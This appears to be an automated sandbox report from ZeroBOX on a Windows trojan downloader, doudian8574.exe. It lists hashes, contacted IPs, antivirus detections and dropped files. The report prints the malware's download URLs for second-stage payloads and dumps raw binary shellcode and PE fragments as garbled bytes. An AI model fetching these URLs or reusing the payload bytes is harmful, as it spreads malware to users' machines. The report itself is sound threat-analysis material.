Summary | ZeroBOX

doudian8574.exe

Tags: Malicious Library, UPX, PE64, PE File, DLL, OS Processor Check, CHM Format
Category: FILE
Machine: s1_win7_x6403_us
Started: Aug. 12, 2023, 7:09 p.m.
Completed: Aug. 12, 2023, 7:12 p.m.
Size 52.5KB
Type PE32+ executable (GUI) x86-64, for MS Windows
MD5 11746e92a679b202ffc31a9397db030f
SHA256 a511fac843b237992e58bde1e41ec271891e96c9e32279687c058baea9f005a2
CRC32 72408A7D
ssdeep 768:V4f9SsBo7cTlFWT8llD4zAA8lU6ez5cIgQMzKHMcTzH5iakD0XdLIsybqvZY:2foF7cvWTEPUP5/gQoqZTliIoeZ
Yara
  • IsPE64 - (no description)
  • Malicious_Library_Zero - Malicious_Library
  • PE_Header_Zero - PE File Signature

IP Address Status Action
117.18.232.200 Active Moloch
121.199.204.174 Active Moloch
121.199.204.179 Active Moloch
164.124.101.2 Active Moloch
47.110.23.90 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
request GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml
request GET https://yts2023811.oss-cn-hangzhou.aliyuncs.com/3.bin
request GET https://2023816.oss-cn-hangzhou.aliyuncs.com/hrsgdsb8574wknzms.jpg
request GET https://2023815.oss-cn-hangzhou.aliyuncs.com/UnityPlayer.dll
request GET https://2023815.oss-cn-hangzhou.aliyuncs.com/ttd.exe
request GET https://2023816.oss-cn-hangzhou.aliyuncs.com/qd.CHM
request GET https://2023816.oss-cn-hangzhou.aliyuncs.com/md.exe
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2084
region_size: 421888
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000026d0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
Status: 1, Return: 0, Repeated: 0
file C:\Users\Public\Documents\Microsoft\UnityPlayer.dll
file C:\Users\Public\Documents\Microsoft\windows.exe
file C:\Users\Public\Documents\ttd.exe
file C:\Users\Public\Documents\UnityPlayer.dll
file C:\Users\Public\zdmxd.exe
Time & API Arguments Status Return Repeated

SetFileAttributesW

file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: C:\Users\Public\Documents\
filepath: C:\Users\Public\Documents\
Status: 1, Return: 1, Repeated: 0
Time & API Arguments Status Return Repeated

InternetReadFile

buffer: èYI‰ÈHÁ# º²‹÷IÀ#cA¹VH‰æHƒäðHƒì0ÇD$ èH‰ô^ÃH‹ÄH‰XD‰H L‰@‰PUVWATAUAVAWHl$HìpE3ÿÇEØkeH‹ñL‰}ø¹œ¿½L‰}ÈL‰}EOeL‰}DˆM¼DˆM¢L‰}L‰}ðL‰}D‰}$D‰|$,ÇEÜrnÇEàelÇEä32ÇEè.dÇEìllÇD$@SleeÆD$DpÇD$XLoadÇD$\LibrÇD$`aryAÇD$HVirtÇD$LualAÇD$PllocÇD$hVirtÇD$lualPÇD$protefÇD$tctÇE¨FlusÇE¬hInsÇE°trucÇE´tionÇE¸CachÇD$xGetNÇD$|ativÇE€eSysÇE„temIfÇEˆnfÆEŠoÇERtlAÇE”ddFuÇE˜nctiÇEœonTafÇE blè¹µAÙ^H‹ØèrL‹èH‰EÐHEØÇE LL$8H‰E(LE 3Ò3ÉÿÓH‹L$8HD$HE3ÀH‰D$0LMÈÇD$( HT$(AÿÕH‹L$8HD$hE3ÀH‰D$0LMÇD$(HT$(AÿÕHE¨ÇD$(H‹L$8LME3ÀH‰D$0HT$(AÿÕH‹L$8HD$xE3ÀH‰D$0LMÇD$(HT$(AÿÕH‹L$8HD$@E3ÀH‰D$0LMðÇD$(HT$(AÿÕH‹L$8HEE3ÀH‰D$0LMÇD$(HT$(AÿÕH‹L$8HD$XE3ÀH‰D$0LMøÇD$( HT$(AÿÕL9}È„L9}„L9}ð„ L9}„ÿH‹UH…Ò„òHc~<Hþ?PE…߸d†f9G…ÐEOD„O8…·OA‹ßHƒÁ$fD;s%D·GHÏD9y‹G8EAHI(;ÃFËØM+ÁuãHM8ÿҋU<D‹ÂDrÿ÷ÚDwPIHÿ‹ÂL#ð‹ÃHÈI@ÿH÷ÐH#ÈL;ñ…TH‹O0A¼0E‹ÄA¹I‹ÖÿUÈH‹ØH…ÀuDHE‹ÄI‹Ö3ÉÿUÈH‹ØD‹¥ÐA»E„ãt‹F<‰C<‹V<ë ‹ÊAӊ1ˆ;WTrðëA‹×D9Tv‹ÊAӊ1ˆ;WTrðHc{<E‹×HûH‰}0D·GIƒÀ(fD;s:LÇE‹ÏE98vA‹PA‹HüA‹ÁEËHÈHЊ2ˆE;rá·GEÓIƒÀ(D;ÐrÉL‹óA¸L+w0„ÖD9¿´„ÉD‹°LËE99„¶MQé‘E·A·ËA·ÃfÁé fƒù u)E‹AãÿKH‹KA»IÖH‰ECëOA»fƒùu%ÿH A‹Æë.fA;Ëu%ÿH I‹ÆHÁè·ÀëfA;Èu%ÿH A·ÆA‹H MÐA‹AIÁL;Ð…_ÿÿÿM‹ÊE9:…JÿÿÿD9¿”„‚‹E‹ïLI@ ëEëH@D98uôA‹Äƒà‰EÀ‹Á„‰E;놀AÁìE]ÿE‹×E…ÛttM‹ÈA¾ÿA3ÒA‹ÍA+ÊiöýCA‹Æ÷ñ3ҁÆÞ&H‹ÆÁèA#Æ÷ñAÂAÿÂH €A‹TˆA ˆAˆA‹AA‰DˆA A‰QMIE;Ór¡‹‡ëD‹eÀ‹ðHó‹F …À„±‹}À‹ÈHËÿUøH‰D$8L‹ÐD‹6D‹~LóLûI‹H…Ét_H…ÉyE·3Òë2HS3ÀHÑ8tH‹ÊHÿÁHÿÀ€9uõH‰T$0E3ÀHT$(f‰D$(f‰D$*M‹ÏI‹ÊÿUÐIƒÆIƒÇI‹H…ÉtL‹T$8ë¡E3ÿ…ÿtAƒýv AiÌèÿUð‹F HƒÆ…À…VÿÿÿH‹}0L‹mÐD9¿ô„©D‹¿ðIƒÇLûE3äA‹…À„Š‹ÈHËÿUøH‰D$8H‹ÈA‹wE‹w HóLóL9&t^I‹H…ÒyD·Â3Òë4LCI‹ÄLÂE8 tI‹ÐHÿÂHÿÀD8"uõL‰D$0HT$(E3Àf‰D$(f‰D$*L‹ÎAÿÕHƒÆIƒÆL9&tH‹L$8ë¢IƒÇ ékÿÿÿE3ÿ·wE‹÷HƒÆ(A¼fD;ƒ H÷D9>„ë‹F‹Èá uºàr…Àx E‹ÄD‰d$ 餅Éu<ºàr …ÀyDAëh…Éu(ºàs …ÀxDAëT…Éuºàs …ÀyDAë@…Ét_ºàr …ÀxA¸ë*…ÉtIºàr …ÀyA¸€ë…Ét3ºàs…Àx A¸ D‰D$ ë!…ÉtºàsD‹D$ …À¹@DHÁëÝD‹D$ ÷Ft Aºè D‰D$ ‹NüLL$ ‹HËÿU·GEôHƒÆ(D;ð‚øþÿÿE3À3ÒHƒÉÿÿUD9¿Ôt$‹‡ÐH‹tëE3ÀA‹ÔH‹ËÿÐHvH‹H…ÀuéL‹MM…Ét/‹‡¤…Àt%‹ÈL‹ÃH¸«ªªªªªªªH÷ዏ HÁêHËA+ÔAÿыG(M‹ÄHÃA‹ÔH‹ËÿЋµ¸…ö„—D9¿Œ„Š‹ˆHËD‹YE…ÛtxD9ytrD‹I A‹ÿ‹Q$LËHÓE…Ût]E‹E‹×LÃtRë ¾ÀDÐAÁÊ MÄAŠ„ÀuìA;òuH…ÒuAüIƒÁHƒÂA;ûs"ëËA· 
H˕ÈD‹ˆH‹ÀLÃAÿÐH‹Ãë3ÀH‹œ$°HÄpA_A^A]A\_^]ÃÌH‹ÄH‰XH‰hH‰pH‰x AVHƒìeH‹%`‹éE3öH‹PL‹JM‹A0M…À„³AAXIc@<A‹ÖM‹ ó$F‹œˆE…ÛtÒH‹$HÁèfD;ðs"H‹L$D·Ð¾ÁÊ €9a|ƒÂàÐHÿÁIƒêuçOE‹ÞA‹z IøE9rvŽ‹7A‹ÞIðH¾HÿÆÁË لÉuñ;ÅtAÿÃE;ZrÕé^ÿÿÿA‹B$C IÀ·A‹JIȋ‘IÀë3ÀH‹\$ H‹l$(H‹t$0H‹|$8HƒÄA^ÃMZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $Ÿ IÛk'ÒÛk'ÒÛk'ÒÏ$ÓÑk'ÒÏ#ÓÏk'ÒÏ"Ótk'҉#ÓÔk'҉$ÓÑk'҉"ӗk'ÒÏ&ÓÖk'ÒÛk&ÒEk'Ò.ÓÙk'Ò'ÓÚk'Ò%ÓÚk'ÒRichÛk'ÒPEd†\áÖdð" ²À””€À`PŸH˜ŸŒPT9 °@ 8€ 8И.textè±² `.rdataìÛÐܶ@@.data€’°v’@À.pdataT9P:@@_RDATAôB@@.reloc° D@BHƒì(H Õè$TH °HƒÄ(éˆH ]°éˆH õ¯éˆHƒì(A¹H×E3ÀH ]èœbH e°HƒÄ(éԇ@SHƒì ¹èÄH ¡H‹ØèñbHòÔE3ÀH‹ÓH‰…H ~ègH j°HƒÄ [鄇H‹ñHêH‰CHcHH‹0
request_handle: 0x0000000000cc000c
Status: 1, Return: 1, Repeated: 0

InternetReadFile

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $(Ånl¤p=l¤p=l¤p=xÏt<g¤p=xÏs<i¤p=xÏu<é¤p=>Ñt<b¤p=>Ñs<e¤p=>Ñu<N¤p=xÏq<i¤p=l¤q=4¤p=«Ñy<n¤p=«Ñp<m¤p=«Ñr<m¤p=Richl¤p=PEd†çÖÖdð" äÔP€`àL,<Àª˜ ðpðw80x8P.textÜãä `.rdata˜šè@@.data  ‚@À.pdataÀŽ@@_RDATAüà @@.relocpð¢@B
request_handle: 0x0000000000cc0018
Status: 1, Return: 1, Repeated: 0

InternetReadFile

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $ö£ty²Â*²Â*²Â*ݦ+¸Â*ݦ+·Â*ݦ+?Â*ݦ+°Â*àª+”Â*àª+¢Â*àª+ºÂ*6«+±Â*²Â*àÂ*6«+°Â*6«+³Â*6«å*³Â*6«+³Â*Rich²Â*PEd†ˆÂÓ]ð" ž^ `@0 §+ `1ˆ˜1<pà ` î ˜ p"TÐ"° .textpž `.rdataވ°Š¢@@.dataÈ@ ,@À.pdata `6@@.rsrcà p¢D@@.reloc æ @B
request_handle: 0x0000000000cc0018
Status: 1, Return: 1, Repeated: 0

InternetReadFile

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $(Ånl¤p=l¤p=l¤p=xÏt<g¤p=xÏs<i¤p=xÏu<é¤p=>Ñt<b¤p=>Ñs<e¤p=>Ñu<N¤p=xÏq<i¤p=l¤q=4¤p=«Ñy<n¤p=«Ñp<m¤p=«Ñr<m¤p=Richl¤p=PEd†çÖÖdð" äÔP€`àL,<Àª˜ ðpðw80x8P.textÜãä `.rdata˜šè@@.data  ‚@À.pdataÀŽ@@_RDATAüà @@.relocpð¢@B
request_handle: 0x0000000000cc0018
Status: 1, Return: 1, Repeated: 0

InternetReadFile

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $ö£ty²Â*²Â*²Â*ݦ+¸Â*ݦ+·Â*ݦ+?Â*ݦ+°Â*àª+”Â*àª+¢Â*àª+ºÂ*6«+±Â*²Â*àÂ*6«+°Â*6«+³Â*6«å*³Â*6«+³Â*Rich²Â*PEd†ˆÂÓ]ð" ž^ `@0 §+ `1ˆ˜1<pà ` î ˜ p"TÐ"° .textpž `.rdataވ°Š¢@@.dataÈ@ ,@À.pdata `6@@.rsrcà p¢D@@.reloc æ @B
request_handle: 0x0000000000cc0018
Status: 1, Return: 1, Repeated: 0

InternetReadFile

buffer: MZÿÿ¸@ິ Í!¸LÍ!This program cannot be run in DOS mode. $-ƒ:CiâTiâTiâT”þWâT”ÊcâT”ÿIâT`šÇnâTiâU!âT”ûhâT”ÉhâTRichiâTPEd†¥SÓdð"  `à@Lð@`@ôT Pô(UPX0à€àUPX1`ð`@à.rsrcPd@À3.96UPX! $e+°Ói':\ÞIj
request_handle: 0x0000000000cc0018
Status: 1, Return: 1, Repeated: 0
host 117.18.232.200
registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1201
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob
process doudian8574.exe useragent Downloader
process doudian8574.exe useragent RookIE/1.0
process doudian8574.exe useragent FileDownload
Lionic Trojan.Win32.Agent.Y!c
Elastic malicious (high confidence)
Malwarebytes Generic.Malware/Suspicious
Sangfor Downloader.Win32.Agent.Vy0i
Cybereason malicious.630909
Symantec ML.Attribute.HighConfidence
ESET-NOD32 a variant of Win64/TrojanDownloader.Agent_AGen.DC
APEX Malicious
Kaspersky Trojan-Downloader.Win32.Agent.xyaytd
Avast FileRepMalware [Misc]
Tencent Win64.Trojan-Downloader.Oader.Hflw
Sophos Mal/Generic-S
McAfee-GW-Edition BehavesLike.Win64.NetLoader.qm
SentinelOne Static AI - Suspicious PE
Antiy-AVL GrayWare/Win32.Wacapew
Microsoft Trojan:Win32/Casdet!rfn
ZoneAlarm Trojan-Downloader.Win32.Agent.xyaytd
McAfee RDN/Generic Downloader.x
Cylance unsafe
Panda Trj/Chgt.AD
TrendMicro-HouseCall TROJ_GEN.R002H0DHB23
Rising Downloader.Agent!8.B23 (TFE:5:VthFwSSuMeK)
Ikarus Win32.Outbreak
MaxSecure Trojan.Malware.300983.susgen
Fortinet W64/Agent_AGen.DC!tr.dldr
AVG FileRepMalware [Misc]
DeepInstinct MALICIOUS
CrowdStrike win/malicious_confidence_100% (W)